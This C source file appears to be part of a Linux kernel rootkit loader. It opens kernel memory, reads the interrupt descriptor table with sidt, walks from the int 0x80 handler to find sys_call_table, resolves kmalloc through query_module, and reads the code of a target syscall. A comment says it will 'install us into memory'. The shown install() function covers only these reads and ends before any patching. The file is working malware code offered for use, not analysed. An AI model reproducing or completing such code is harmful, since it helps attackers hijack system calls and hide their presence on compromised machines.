#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

#define ulong unsigned long
#define uchar unsigned char

#include "idt.h"
#include "syscall.h"
#include "kmem.h"
#include "pattern.h"

/* kmalloc() hint */
ulong	kma_hint_lookup(ulong *buf, int count, char *name)
{
	int	l = strlen(name);
	int	i;
	char	*n;
	ulong	a = 0;

	/* try to match exactly */
	for (i = 0; i < count; i++) {
		n = (char *) (buf[i*2+1] + (ulong) buf);
		if (!strcmp(n, name)) {
			a = buf[i*2];
			break;
		}
	}

	/* revert to strncmp() */
	for (i = 0; i < count; i++) {
		n = (char *) (buf[i*2+1] + (ulong) buf);
		if (!strncmp(n, name, l)) {
			a = buf[i*2];
			break;
		}
	}

	return a;
}

#define KMH_SIZE	128*1024
ulong	get_kma_hint() {
	uchar	qbuf[KMH_SIZE];
	uchar	*kmt[] = { "kmalloc", "_kmalloc", "__kmalloc", NULL };
	int	ret, i;
	ulong	a;

	if (query_module(NULL, QM_SYMBOLS, qbuf, sizeof(qbuf), &ret) < 0)
		return 0;

	for (i = 0; kmt[i]; i++) {
		a = kma_hint_lookup((ulong *) qbuf, ret, kmt[i]);
		if (a) return a;
	}

	return 0;
}


/* this will try to install us into memory */
int	install(char *buf, int size)
{
	int		fd;
	ulong		sct;
	struct idtr	idtr;
	struct idt	idt80;
	ulong		oldsys;
	ulong		sctp[2];
	ulong		old80;

	fd = open_kmem();
	if (fd < 0) {
		printf("Error: Can't open kernel memory for read (%d)\n",
			-fd);
		return 1;
	}

	asm ("sidt %0" : "=m" (idtr));

	if (rkm(fd, &idt80, sizeof(idt80),
		idtr.base + 0x80 * sizeof(idt80)) == (off_t)-1) {
		printf("Error: IDT table read failed (offset 0x%08x)\n",
			(uint) idtr.base);
		close(fd);
		return 1;
	}

	old80 = idt80.off1 | (idt80.off2 << 16);
	sct = get_sct(fd, old80, sctp);

	if (!sct) {
		printf("Error: Can't find sys_call_table[]\n");
		close(fd);
		return 1;
	}

	if (rkml(fd, &oldsys, sct + OURSYS * 4) == (off_t)-1) {
		printf("Error: Can't read syscall %d addr\n", OURSYS);
		close(fd);
		return 1;
	}

	if (rkm(fd, buf, 1024, oldsys) == (off_t)-1) {
		printf("Error: Can't read kernel memory.\n");
		close(fd);
		return 1;
	}

	return 0;
}
